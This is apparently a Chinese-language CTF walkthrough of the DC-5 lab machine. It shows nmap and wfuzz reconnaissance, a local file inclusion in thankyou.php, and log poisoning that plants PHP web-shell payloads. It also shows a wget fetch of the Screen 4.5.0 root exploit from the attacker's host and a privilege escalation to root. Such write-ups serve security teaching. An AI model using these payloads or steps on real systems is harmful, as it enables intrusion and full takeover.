DC-5
主机发现端口扫描
探测存活主机,
175是靶机1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16nmap -sP 192.168.75.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
Nmap scan report for 192.168.75.1
Host is up (0.00022s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:FB:CA:45 (VMware)
Nmap scan report for 192.168.75.175
Host is up (0.00016s latency).
MAC Address: 00:0C:29:BF:7F:5F (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:FE:CA:7A (VMware)
Nmap scan report for 192.168.75.151
Host is up.扫描靶机所有开放端口
1
2
3
4
5
6
7
8
9
10nmap -sT -min-rate 10000 -p- 192.168.75.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
Nmap scan report for 192.168.75.175
Host is up (0.00040s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
57203/tcp open unknown
MAC Address: 00:0C:29:BF:7F:5F (VMware)扫描服务版本及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16nmap -sV -sT -O -p80,111,57203 192.168.75.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
Nmap scan report for 192.168.75.175
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
57203/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:BF:7F:5F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19nmap -script=vuln -p 80,111,57203 192.168.75.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
Nmap scan report for 192.168.75.175
Host is up (0.00052s latency).
PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.75.175:80/contact.php
| Form id: fname
|_ Form action: thankyou.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open rpcbind
57203/tcp open unknown
MAC Address: 00:0C:29:BF:7F:5F (VMware)没什么实质性信息,依旧是80端口开始
web渗透
访问主页
扫描目录,没什么可以关注的
1
2
3
4
5
6
7
8
9dirsearch -u 192.168.75.175 -x 403
//
[13:40:35] Starting:
[13:40:56] 200 - 4KB - /contact.php
[13:40:56] 301 - 184B - /css -> http://192.168.75.175/css/
[13:41:00] 200 - 6KB - /faq.php
[13:41:01] 200 - 17B - /footer.php
[13:41:03] 301 - 184B - /images -> http://192.168.75.175/images/
[13:41:25] 200 - 852B - /thankyou.php我们看官网下的小提示:这个特定的入口点可能很难识别,但它确实存在。您需要寻找一些不寻常的东西(刷新页面时会发生变化的东西),我们可以注意到每次提交
footer页面的年份就会不一样
可能入口就存在页脚里
访问
/footer.php,一直刷新年份也会变,所以就是thankyou页面包含了footer.php,可能存在参数来包含footer.php,使用wfuzz来尝试混淆出参数1
2
3
4
5
6
7
8
9
10
11
12
13
14
15# 尝试包含 /etc/passwd
wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
Total requests: 3024
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001053: 200 70 L 104 W 2319 Ch "file"混淆出参数
file,可能就是使用file参数来包含文件的,成功包含/etc/passwd
因为不存在登陆页面,所以包含了
/etc/passwd文件也没用,根据CTF的思路我们尝试包含日志文件1
/thankyou.php?file=/var/log/nginx/access.log
包含成功!
尝试后,
UA插入php代码不成功。最后,我们可以将php代码插入到file参数后,使其发生错误,然后将该语句留在error.log里(这里开始靶机IP改为
176,之前乱搞把之前的靶机搞坏了)1
http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
包含
error.log,存在<?php @eval($_POST['b']); ?>即可1
22024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning: include(<?php @eval($_POST['b']); ?>): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
PHP message: PHP Warning: include(): Failed opening '<?php @eval($_POST['b']); ?>' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"使用蚁🗡连接(密码是
b,取决以你的post参数),然后在蚁🗡里面启动终端然后反弹shell
提权
查看权限
1
2
3
4
5
6(www-data:/var/www) $ whoami
www-data
(www-data:/var/www) $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(www-data:/var/www) $ uname -a
Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux寻找敏感文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17(www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs发现
screen-4.5.0搜索
screen-4.5.0是否存在提权漏洞1
2
3
4
5
6
7searchsploit screen 4.5.0
------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------将
linux/local/41154.sh拿去下来下载到靶机执行脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32$ wget http://192.168.75.151/41154.sh
converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
--2024-11-03 05:11:00-- http://192.168.75.151/41154.sh
Connecting to 192.168.75.151:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [application/x-sh]
Saving to: '41154.sh'
41154.sh 100%[=====================>] 1.12K --.-KB/s in 0s
2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]
//
$ chmod u+x 41154.sh
//
$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# whoiam
whoiam
sh: 2: whoiam: not found
# whoami
whoami
root提权成功,读取
flag文件1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19# cat thisistheflag.txt
cat thisistheflag.txt
888b 888 d8b 888 888 888 888
8888b 888 Y8P 888 888 888 888
88888b 888 888 888 888 888
888Y88b 888 888 .d8888b .d88b. 888 888 888 .d88b. 888d888 888 888 888 888 888
888 Y88b888 888 d88P" d8P Y8b 888 888 888 d88""88b 888P" 888 .88P 888 888 888
888 Y88888 888 888 88888888 888 888 888 888 888 888 888888K Y8P Y8P Y8P
888 Y8888 888 Y88b. Y8b. Y88b 888 d88P Y88..88P 888 888 "88b " " "
888 Y888 888 "Y8888P "Y8888 "Y8888888P" "Y88P" 888 888 888 888 888 888
Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated. :-)
I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.